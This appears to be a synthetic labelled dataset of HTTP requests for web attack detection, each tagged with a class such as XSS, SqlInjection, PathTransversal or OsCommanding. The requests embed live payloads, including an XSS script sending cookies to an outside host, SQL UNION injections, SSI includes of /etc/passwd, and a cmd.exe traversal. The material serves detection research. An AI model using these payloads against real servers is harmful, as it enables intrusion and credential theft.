Cookie: JmOe=sehhdoiitabaW;nhi=9Iij0;odvbscriptt=i\s7;__httpsmyS=ayoa(sn<erTri;e9Xi-v5W=06318;oooa6d1ed61Hd=icuesdm
Cookie2: $Version="6"
Date: Wed, 30 Mar 05 24:25:11 GMT
ETag: "zuQy6UP2oJx68ZPfZ"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Sun, 16 Apr 06 21:53:38 UTC
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 05
MIME-Version: 4.7
Pragma: aluq='yw'
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic MmFnY2FlOmR0ZVNpZDhh
Range: -5
Referer: /zat8/htepan/ri1tpo.php
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: tcisggp8s
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 997 www.raeb.htm "tslwaeaovnN5em24i" "Fri, 27 Jan 06 03:45:51 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37085
Start - Id: 40625
class: SSI
GET /3PVQO3U.2a/noR/4Ff5.uwYLLsdujYTVV/e9u9sQ7/veiAtibnfi/trthaSoeseel/Vwp8hHSy/xj7.L/ritBy1R/n_Y5wX.8R2admin7GY.png?4ENKa=77&7aQl4s5ctm=%3C%21--++++%23include++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E&rlhneCfneseeti=7qoaswl5sT1x HTTP/1.0
Host: www.lcIu4tidhe.net
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: p-donn;q=0.9, evusnlde-gpwtia8, iseh-sEtqns;q=0.0, lnr-zUteIx;q=0.6, l5-aeaas9ol
Cache-Control: eoi='t0lmsnr'
Client-ip: 134.67.83.123
Cookie: dssErcg=nEIZY7N5;teePhish=inv?txtermreini
Cookie2: $Version="48"
Date: Fri, 19 Dec 08 11:11:35 CET
ETag: "IubpgWrdF_VsRCB06yK"
Expect: 100-continue
From: eneiaiie@acs8.cz
If-Modified-Since: Mon, 25 Feb 08 14:26:37 GMT
If-Unmodified-Since: Fri, 27 Nov 09 03:32:20 UTC
If-Match: *
If-None-Match: *
If-Range: "CzLcEa@yb2GNdmbL"
Max-Forwards: 5
MIME-Version: 8.9
Pragma: i=sgch
Proxy-Authorization: NTLM b2wxSUcwZXI5bmlhbmlzNmlhbGhhZWdzM3d0ZHRlZWx3YmVtQnRl
Authorization: NTLM bzVyb0VoeWxkaXVuU3BhZXV1cmRlZWFhbm1iZWczd3U4
Range: 656012-5
Referer: http://www.add6eht.be/ealtfei.wav
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/5.3 (Windows; U; WinNT 3.7; ma-ov; rv:1.8.6) Gecko/54341353
UA-Disp: 959,926,32
Via: 6.4 123.110.235.206
Transfer-Encoding: ri2g
Upgrade: Rmh/4.4, haai/8.8, sr7/0.2, 8syo/9.3, invat/6.5
Warning: 308 68.164.17.248 "itScteuheeanafg" 
X-Forwarded-For: 130.86.64.49
X-Serial-Number: 436049584968
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40625
Start - Id: 48022
class: XSS
GET /6uBC@L6nOO/0ihrnrerd/iertmetlssisihIAbo/hC2_jK0FSAbEaZap.4/o2urmeeelotfrrn/e6cc2CS7XMGHW5KG3MN/h6cO391Exo1Ju5ANG.exe?sen6o=37974&q.BjUvtPxbuC=thMSige7V&in=+%24r&jaksrtavoi=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.iearenol.com%2Fcgi-bin%2Fngmellilng.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++++%3E&hszdy3hderSp7gN=wl1igOjsn HTTP/1.1
Host: www.whhhI.gov:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: max-age=88568
Client-ip: 229.36.28.9
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Sat, 24 Nov 07 06:10:48 UTC
ETag: "GJ8gcU4@LIDaCNFpkX9Z"
Expect: aVnq
From: uesois@ewrsoxtt.it
If-Modified-Since: Fri, 01 Oct 04 17:30:18 GMT
If-Unmodified-Since: Wed, 24 Mar 04 04:26:54 CET
If-Match: "ObLaTPHaQn.IRrY"
If-None-Match: *
If-Range: "liCntScoKYa_L@U0n"
Max-Forwards: 07
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uedrde k86eh=jiih
Authorization: NTLM bG9lZWRlTDJlaHJ0bm1hclRTbnRtaWdzb3Z0SWl5V2VtNXQ=
Range: 3837-2
Referer: http://niNLT.be/teOmeti/o1ytphp.bin
TE: chunked;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/9.5 (compatible; bEmwe; SunOS sun4u; 5t9shhhs; iSa5acT; a5acDiobad)
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: HTTP/3.5 www.czeacsu0.css, 4.9 www.hc6ot.js:9007
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48022
Start - Id: 35952
class: PathTransversal
PUT /cexWlCz9ISV0waWcNHe/dBeew4TyVdn/d5SEh1f68U.cfm? HTTP/1.0
Content-Length: 237
Content-Language: r,e
Content-Encoding: compress
Content-Location: /fttne/ui0lnos6/eteRujle.nsf
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Aug 09 24:49:14 GMT
Last-Modified: Tue, 12 Dec 06 21:47:47 GMT
Host: 190.234.122.113
Connection: close
Accept: image/png, audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: <!--  #include  virtual="/etc/passwd"    -->
Accept-Language: *;q=0.3
Cache-Control: max-age=6
Client-ip: 35.152.197.66
Date: Mon, 22 Mar 04 21:52:52 GMT
ETag: "_aOgMb2F1k5tbwYF3T"
If-Modified-Since: Sat, 24 Jan 04 04:00:05 UTC
If-None-Match: *
If-Range: Mon, 23 Aug 04 18:17:07 CET
Pragma: eqvrsp=t8haga
Referer: http://www.caen.biz/7fobhae/2pdt/0fhyu/x0tvgA.css
User-Agent: Mozilla/7.1 (Machintosh; U; PPC Mac OS X 3.6; Up-6e; rv:0.3.6) Gecko/52225758
Via: 0.4 59.15.61.81
Upgrade: Rfz/7.9, udid/0.4, wei/3.9, u7ae/3.9, eaa/2.9

rdpty=ic wQssinputu2jaiS&litrNrstEifi=130270&m1fdsezpdiesrhX=hiok&qau0kdpl=won&Lp3JqRMDS7Uw=allo&cjl2wbfeo=la&toevenlt0wvt=e6buVtb12yX&ysyz=83| &fLekodtHUh=rtmrdrop&0quo2LiePtLan=Atpj9gruhw&boynyskhkwTsqy=TtNnlhezcn&ynn3dsjeearnu3e=260

End - Id: 35952
Start - Id: 42444
class: SqlInjection
GET /jyF/positionQnullXexeczacceptmrBy/iUeNnhoes8veslu0/itirua/tG/kttbfd21rEczr2/agkn@P710e3F3nAS7/lfieyDlpe/bmp6DG-YEv.mHTB/1glach4new/lgL4wyB/wU.mdb?CcatEF=0305711&cbr=6233851647&Enathlos9o0s=dL-HR%40vyaI&-kgscriptscriptJTNSoN=ainvefyeeeo&RA6QFLJE=%27++or++++id+++in+%28++++select++++*++from++user_db+%29 HTTP/1.1
Host: 82.184.114.4
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis, windows-1251;q=0.4, iso-2022-kr, iso-8859-2;q=0.9, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=6956
Client-ip: 157.146.100.76
Cookie: m6ooniseoa=lutdh0laeeoiMtaz;u4d=iewaza5ai7u6mu3;c0ben=swEOoygno3hlxnsS1e;srn1h0cahebramd=0MuzI;uhotpnfu=$a;zlobl=rFeeoTeXe
Cookie2: $Version="4"
Date: Sun, 21 May 06 18:02:24 CET
ETag: W/"ZbCh2.5HW9thkkZo7n6R"
Expect: 100-continue
From: sghAd@3nTei.org
If-Modified-Since: Tue, 02 Jan 07 06:02:37 GMT
If-Unmodified-Since: Mon, 17 Jul 06 03:57:42 UTC
If-Match: "Yd4.RPTuLWsCuF9"
If-None-Match: "sUmghx9.Fo4xOPb"
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 7
MIME-Version: 9.9
Pragma: y03='en5osshi'
Proxy-Authorization: Digest realm
Authorization: Basic MGxkNWRhOmtlaGlp
Range: 378414-80248,967-,-2698
Referer: http://www.meeeC.biz/itWhard/2ahE/epimhrrc.fgf
TE: deflate;q=0.0,deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 2.6; Ie-tF; rv:4.3.0) Gecko/23661076
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 028x6235
Via: 2.2 128.56.155.173, 3.3 21.123.115.151, tbd/3.9 www.oit4othh.js
Transfer-Encoding: compress
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42444
Start - Id: 48103
class: XSS
GET /td3DJu@7vs5X3VUupTIW/O49iframe/gyhFothtguRo/dauY/BsOWbi/nPRdsIgtThw18/iHaateiatrnuOss0A1/sdmlxA5re/elo/1U0n3.BuF_ny./laj7pFv9m7AP8.exe?drno857Ayhzrs9p=5&itbieocuu=0copyaen&hTEZE8t7DM=%3Cxml++src%3D+++%22+javascript%3A++++%5Balert%28%27yiknsap%27%29%3B%5D+%22++++%3E&ryoey7tciyef7Xr=ne&eR9aehrtH=jie&Q1QJhh=hS4d2ZBk&0NocreA2cdorr=oi%29a%29nohsftpviframexaa&Sruhfm=zisbyheEiina+op&h3dun=3&sIMbtt=rFR&so=lb%24sboot.iniila+oaeeHo HTTP/1.1
Host: www.dhsnBnB0nc.org
Connection: e7Naes1e
Accept: application/rtf;q=0.9, audio/*
Accept-Charset: x-mac-icelandic, euc-cn;q=0.0, utf-8;q=0.5, windows-1254;q=0.8, x-mac-hebrew;q=0.4
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=092
Client-ip: 44.194.102.2
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Fri, 08 Oct 04 19:52:00 UTC
ETag: "9EHYczVAM469GwcD"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Mon, 24 Dec 07 22:04:59 UTC
If-Unmodified-Since: Sun, 07 May 06 03:14:47 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: *
Max-Forwards: 8519
MIME-Version: 8.9
Pragma: mooeci8=awue
Proxy-Authorization: nii4 fncehnss=cd2a
Authorization: ny9cr sjeOhe=rf9a
Range: -913822,250-
Referer: /leaou/emen.js
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 1.3; th-dt; rv:7.1.0) Gecko/28803244
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: 7.5 www.en0tt.js:3, 3.5 94.241.180.137:890, 5.1 151.104.175.37
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48103
Start - Id: 48687
class: XPathInjection
POST /a408dpeeteOtssthoago.swf? HTTP/1.0
Content-Length: 304
Content-Language: rvr,t5,neiacr
Content-Encoding: compress
Content-Location: /4yt0euea/apes/t1aiuY/n0ucgt.wav
Content-MD5: TWc4ZnlzZ2VsdHd0NG9pNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: 62.53.151.93:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-tw;q=0.5, iso-2022-jp;q=0.5
Accept-Encoding: deflate;q=0.0
Accept-Language: lecsg4xs-swss;q=0.2
Cache-Control: no-transform
Client-ip: 51.92.30.120
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Wed, 27 Sep 06 15:39:21 GMT
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
If-Modified-Since: Sun, 05 Oct 08 08:14:29 UTC
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: "f4@RrdbWzpGbtLPDUT"
If-None-Match: *
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 131
Pragma: O64=uhud
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Referer: http://www.hirr.uk/lbsa/otrei/antrI/atip/Rglued.tiff
Trailer: Accept
User-Agent: Mozilla/0.2 (compatible; MSIE 2.8; Open BSD i586; yipo)
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: gzip
Upgrade: ereeos/7.6, tgr/8.5, 4idl/4.6, oth/2.8, Gpir/5.3
X-Serial-Number: 3185085450816900238

emlSni=a.AS_&Ytu=0956&8fEaGJOimg=olsqur/v1mrw/an/child::node()[position()=526]  or    'cf'   ='&SCQ98andFXHj=217&09iXMx=3&ryeaN22sdxm=yiLg_&c4geerrMutl=29096&snpeomdeus=8168024&otuh0on=gr&cdaDbno=hena&pB4mo1y8=0&n2MqX6ESzmailJ=01130&.4xaI1VIEd=s14eoe&letiafftgo=2&lye=dAgr

End - Id: 48687
Start - Id: 42021
class: SqlInjection
GET /vstdiny2-9nLs9YxDB/obaesaix7Nqmxgacwnes/lQCG0ztd8hqIgdpAEg/oht7tokhrltek/eUssttby/u3/6x/edrDrr/eTRk/UAAX0.dll?y5bT=%27++%29+++UNION++++ALL+++++SELECT+eare5+FROM+++10d+++WHERE+%28+++%27%27++%3D++++%27&ez=a3heIais HTTP/1.0
Host: 203.200.132.4
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ie-utasayo;q=0.1, h-Tbtwuy5
Cache-Control: no-store
Client-ip: 144.52.64.113
Cookie: ldeeptxIH=va;-3YJmpr_=q;position9zTgCzW5=877
Cookie2: $Version="334"
Date: Sun, 30 Sep 07 02:21:35 CET
ETag: "xrVUfSsUKUujhJHXyI"
Expect: ouiSlPr
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 08 Mar 06 19:03:20 UTC
If-Unmodified-Since: Sat, 31 Dec 05 10:00:25 CET
If-Match: "Grhx@b@7p0VR3nv"
If-None-Match: "ET5za89pIK5.DkzGsT6V"
If-Range: *
Max-Forwards: 0
MIME-Version: 9.3
Pragma: ali7k=sesm16
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /pIz2tM.tiff
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/7.2 (X11; U; Linux i586 3.3; se-ca; rv:2.1.4) Gecko/17023505
UA-CPU: 68000
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: FTP/3.9 www.8tss9hn.jpeg, 8.5 9.206.170.243
Transfer-Encoding: ncge6; mb73t3n=nUkss
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42021
Start - Id: 37535
class: LdapInjection
PUT /ayxlhir/aehtAt5o4odagnbmi/dFV_Sg4sxn.c0ILgmr4t/lLB6thPUnPL/theinncrf9i6ardferas/YYOuOMJQ_wOA-lo/4x.3vE0Jbetween3Jvarp/6FafwQFl3DDJxZO9PD/ons4I42bl/r3ulGPJuW0ffrLc.VfqX.jpeg? HTTP/1.1
Content-Length: 346
Content-Language: udi,ct,ac
Content-Encoding: deflate
Content-Location: /cVthDOt.dll
Content-MD5: ZW9hNm9ybm9lbmR0Yk55aA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Tue, 23 Oct 07 10:56:24 GMT
Host: 159.151.113.164
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, iso-8859-4;q=0.8, big5;q=0.7
Accept-Encoding: 
Accept-Language: tSosehif-hP
Cache-Control: ah=ph
Client-ip: 133.128.23.213
Cookie: qNi_LslQinwinnte=?10;bosndNetiaetu=|hb;ZexbSYTautoexecQ.=mVZ5rjCUn;cumvs80av=oQYczt-;NlLMelathhru=tqhctDhclunh
Cookie2: $Version="02"
Date: Sat, 11 Jun 05 08:47:07 GMT
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 5scdi=bsklE1e;ireeen
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: "mx6513s4eb7GsNrm"
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Sat, 11 Aug 07 18:52:56 CET
Max-Forwards: 3
MIME-Version: 9.7
Pragma: aisGoeti='h'
Proxy-Authorization: rertml hneO5=eocht
Authorization: Digest realm
Range: 0516-7855,069180-,334-
Referer: /Tktao5u/atTtn/ebrwroeg/Taemt/eMrs.mspx
TE: chunked
Trailer: TE
User-Agent: esr5orsg (sfHlMKc; aI4sxdTyzw; hhTzz0O; mewHaTjM)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 1.2 119.3.52.102
Transfer-Encoding: deflate
Upgrade: olnrf/9.1
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

iti=)   ( |  (cn=*o'brien*    )(mail    =*o 'brien*   ) &eoid=irnsC@wfyK&fru=euconnectcs&ZsEar=duHaiwrnzhI&Ht9guena=uh&5@JYeAudZ=s5l3&reaxF=vjBAuzz3J&uNsmtolhlpt3tye=85330951&haynnlishcw5np=631&i2kertt3rne=00872443&ceooes2=p>9xa&ltrrrtbADen=752547650&ptsotuE3aaz=nt+m%u&ds7macaie=73&asaoHt8ePdbe6ea=ia| window.open

End - Id: 37535
Start - Id: 44017
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.f2hn.org
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.1
Accept-Encoding: gzip
Accept-Language: j5tecrw-ah7Ae8p, n-np3, trn1pat-b24;q=0.6
Cache-Control: max-stale=953
Client-ip: 78.141.142.69
Cookie: sllodeh7hDsg=t_R-;ereSabreSo4s7NE=nia'Chtpass?ohttps(s;eb1loRurt=g\e;n25grdOorfn=o oo\gg9oIn3alunion;eeO2Wtejs4yOqna=hqR
Cookie2: $Version="5"
Date: Sun, 29 Nov 09 01:04:26 UTC
ETag: "afS5RErKT8MdXnD1pWsB"
Expect: giStcO=hyjghne
From: 44fa@mshrPyo.gov
If-Modified-Since: Tue, 30 Dec 08 21:49:23 UTC
If-Unmodified-Since: Sat, 29 Nov 08 01:35:55 GMT
If-Match: "k3OU0kBy1dz-tyR@"
If-None-Match: "65GUz-dRH2ZQUeIbRsT1"
If-Range: Fri, 31 Aug 07 14:10:23 UTC
Max-Forwards: 3297
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic aW9xM2w6MGFleGE=
Authorization: eIss3 k67Iers6=oa8h
Range: 67-764741,470518-20,3-202913
Referer: http://www.riEl.biz/xienpet/emoqi/peJncet/emnf.php
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Host
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 2.8; ia-tt; rv:7.7.8) Gecko/24319510
UA-CPU: PowerPC
UA-Disp: 675,1960,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5667x180
Via: HTTP/0.2 4.200.156.34:8505
Transfer-Encoding: identity
Upgrade: t8se4/9.5
Warning: 912 248.158.243.227:1807 "eareZo" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44017
Start - Id: 42429
class: SqlInjection
GET /sKskJvm/rLXkbN6gAyjZlj-.swf?jfn=OR+%270Oo4e%27++++BETWEEN+%27R%27+AND+%27T%27&xmlVVFtelnet4LUg7=i86cLvtOrRytTC&tzderoa=tQqlFTzt%40hj&mwp-services6q3ci=%3BEeaa&dhd9Ha=rn9lormjr2nc HTTP/1.1
Host: www.7yIaeranh.com
Connection: 4sdoiel
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, identity, deflate
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 28.141.41.185
Cookie: seRcoic9ypersC=5617;msyUldemds=fIzT02Q991;pleee54frme=eBY;38ydIu=669561
Cookie2: $Version="2"
Date: Fri, 06 Oct 06 04:15:48 GMT
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Tue, 26 Aug 08 24:53:27 GMT
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: "Asx8P9sbgCYJnT."
If-None-Match: "gXheTBCAIWNh3EkZ6"
If-Range: Fri, 06 Jun 08 16:55:49 CET
Max-Forwards: 3
MIME-Version: 0.6
Pragma: aElwt='4pyt'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM c0JhbzNJZWthcmhlc25zZnpob3RBdWd0ZW5hdWFyYXVuYXRqcm9vZXR1c2hF
Range: 005696-6624,4-
Referer: /tjourmgS/hSsoimmh/irwtai.msf
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: If-None-Match
User-Agent: mmomiqehi8 (rWDrbuJoNN; aCYokE; nrCMes0v8)
UA-CPU: 68000
UA-Disp: 9195,5329,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: FTP/5.2 www.feii9i.jpg, Lelid/6.1 70.167.48.162:010
Transfer-Encoding: eseqa
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42429
Start - Id: 41611
class: SqlInjection
GET /tNq3c9TyfzOx/Rrfl--h/Ze88j/d77b@tr/utThZroetIm0te/mojHdieh/eIC1/eRa_QcBUnm/rjIH7QplSUl5U/rEXKlwgkp0--lbdl_L/axPm8b9YG.php4?t7nistidwop8er=yae8dbtoe&ir=i&Glj7biwa=0849671&dc=lstnothe&8ccErdh=op72h1is3%2Flaeapje+tw&keiuine5snno7=Ne%24Kahpgg%2Fe%24+%5Dse0dn&8-uopenyTNU_=%27select++customer_phone+%27%7C%7C%27from+++customers+%27%7C%7C%27where+++customer_surname%3D%27%27%27%7C%7C+++lv_surname%7C%7C%27%27%27+++++and++++customer_type%3D1%27%3B&7ezionetpg=-s5&orua=00969 HTTP/1.0
Host: www.yohi.gov:80
Connection: close
Accept: application/*;q=0.7, text/xml;q=0.1, video/mpeg
Accept-Charset: cp-936, shift_jis;q=0.8, x-mac-ce
Accept-Encoding: compress, compress;q=0.1
Accept-Language: ia-wrHt
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Wed, 16 Apr 08 04:12:04 CET
ETag: "5AYEIKIO38UMnPD"
Expect: 21isusex=tfanht;a6dua
From: tcssd@oays6you.com
If-Modified-Since: Sun, 20 Mar 05 12:09:33 GMT
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: "cYeNe6C.NaPwWJN"
If-Range: Sun, 19 Sep 04 01:58:26 UTC
Max-Forwards: 9
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: Digest qop=habec
Authorization: Digest algorithm=MD5-sess
Range: -27,878-
Referer: /e7anay/apfnXt/5l7o/sd5o/tOpt0as.swf
TE: trailers,trailers
Trailer: Host
User-Agent: Ilmt/6.6.4.3
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/1.1 www.p4oseg.html, 9.5 166.249.120.111
Transfer-Encoding: gzip
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41611
Start - Id: 45877
class: PathTransversal
GET /nvXy/.I_ehKetc@.htm?wsmskedalede=84&i56meifr=ieyrnyn6la6nsblif&riaeemthj41a=48735733&qXMR=0&urnrihll88tevht=noTtt0%5C&ou1bsealsd=20119&lmttcT58unnt=48635069&osoerNeraauo=aju&V9TJ0DD=i81&uNeRSuq54EnIn=tw8wtOu&hblwnr=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&54cxrshoeE=751645 HTTP/1.0
Host: 46.211.201.94:80
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.4, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 251.11.69.130
Cookie: 9yhI=78;nO=55ly
Cookie2: $Version="07"
Date: Sun, 27 Jan 08 08:07:34 GMT
ETag: "qcIN6.ToaSAjnoWr"
Expect: r9wd
From: 5roeHeR9@nsl4pe.de
If-Modified-Since: Thu, 05 Feb 04 05:21:42 UTC
If-Unmodified-Since: Tue, 01 May 07 22:15:29 UTC
If-Match: "G26ugG9CeSPmKJsmF."
If-None-Match: *
If-Range: "YFeUgv.U6F8w9ACRiIM"
Max-Forwards: 189
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM b2hmdHJpYmF0aUFzZWFwRjRpbGw2ZmUxc3dyaGRzMnllZmhtZGg3M2hhdGhl
Authorization: NTLM dGxjcnhpY25lcjNhckRvM2F1dGNsdDhpbWhlbXQyc2hpdGV1ZWU=
Range: 81947-,357703-
Referer: /56gados/bTtee.php
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.2 (compatible; MSIE 2.3; Win98; Erneuksrt; ecweta; Imrntae)
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0549x672
Via: 7.8 www.2Sennyn.jpg:7537, 3.9 www.esrT.htm, HTTP/5.1 134.72.214.137
Transfer-Encoding: pqirj
Upgrade: uerl/3.0, gur/9.5, vSut/6.5
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45877
Start - Id: 38307
class: LdapInjection
GET /yatr/ajH3HqYjZKq9TpW2aIo4/hoaawd.swf?LPfPGRLRDqd=h%25fcm%254style&8nla=-twheren&gUoetnopmrm=%29+%28+++%7C++++%28di4c%3Dse*%29&er=2429767&GobjectautoexectmpjA=+%5D%3A&b8im4amiptaeeU=aTjd&nZeOenwdrnseE=ko&_VLo=%5D-%7Ekltedt%3Aps%40aM+rb&nptenioeyto=lhttCsgLataati5hp&wjWmZGr3=5&7ttOn=tmWSNZ6x.EVO&lEV8=snuisXtnpoosfartcw&pnttgaqarisEHa=45 HTTP/1.0
Host: 3.149.97.150:4174
Connection: close
Accept: application/postscript;q=0.2, audio/x-wav, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: 1oh-ni;q=0.9, ilsmM-xny, d-ta;q=0.1
Cache-Control: no-store
